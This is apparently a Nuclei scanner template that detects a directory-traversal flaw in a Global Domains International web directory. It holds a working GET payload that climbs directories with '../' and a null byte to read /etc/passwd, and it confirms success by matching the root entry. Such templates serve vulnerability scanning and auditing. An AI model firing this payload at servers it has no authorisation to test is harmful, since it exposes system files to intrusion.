26 lines
583 B
YAML
26 lines
583 B
YAML
id: global-domains-lfi
|
|
|
|
info:
|
|
name: Global Domains International Directory traversal Vulnerability
|
|
author: 0x_Akoko
|
|
severity: high
|
|
reference:
|
|
- https://cxsecurity.com/issue/WLB-2018020247
|
|
- http://www.nic.ws
|
|
tags: globaldomains,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|